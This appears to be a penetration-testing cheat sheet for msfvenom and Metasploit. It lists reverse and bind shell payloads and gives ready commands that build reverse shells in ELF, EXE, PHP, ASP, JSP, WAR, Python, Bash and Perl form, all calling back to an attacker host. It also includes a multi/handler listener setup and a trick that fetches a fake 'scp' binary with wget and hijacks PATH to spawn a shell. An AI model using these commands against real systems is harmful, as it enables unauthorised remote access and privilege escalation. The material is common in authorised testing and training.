msfvenom

Show all payloads

msfvenom -l payloads

Show all payload formats

msfvenom -l formats

Generate a payload

msfvenom -p <payload> LHOST=<attacker IP> LPORT=<attacker port> -f <format> -o <output payload file name>

Common payloads

meterpreter

linux/x86/meterpreter/reverse_tcp

linux x86 reverse shell

linux/x64/meterpreter/reverse_tcp

linux x64 reverse shell

windows/meterpreter/reverse_tcp

windows x86 reverse shell

windows/x64/meterpreter/reverse_tcp

windows x64 reverse shell

Staged

linux/x86/shell/bind_tcp

linux x86 bind shell

linux/x86/shell/reverse_tcp

linux x86 reverse shell

windows/shell/bind_tcp

windows x86 bind shell

windows/shell/reverse_tcp

windows x86 reverse shell

Nonstaged

linux/x86/shell_bind_tcp

linux x86 bind shell

linux/x86/shell_reverse_tcp

linux x86 reverse shell

windows/shell_bind_tcp

windows x86 bind shell

windows/shell_reverse_tcp

windows x86 reverse shell

MSFVENOM PAYLOAD

Linux

msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf

Windows

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe

PHP

msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php

Then we need to add the <?php at the first line of the file so that it will execute as a PHP webpage
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war

Python

msfvenom -p cmd/unix/reverse_python LHOST=<IP> LPORT=<PORT> -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=<IP> LPORT=<PORT> -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=<IP> LPORT=<PORT> -f raw > shell.pl

Listener

Metasploit

use exploit/multi/handler
set PAYLOAD <PAYLOAD>
set LHOST <LHOST>
set LPORT <LPORT>
set ExitOnSession false
exploit -j -z

this creates a command for scp.

msfvenom -p linux/x86/exec CMD=/bin/sh -f elf -o scp

wget 192.168.1.23/scp -O /tmp/s** # transfer the exec binary over to Sufferance chmod 755 /tmp/scp

export PATH=/tmp:$PATH --> it sets the tmp as the path

/usr/local/bin/ # it'll now call our "special" scp binary in /tmp instead

Last updated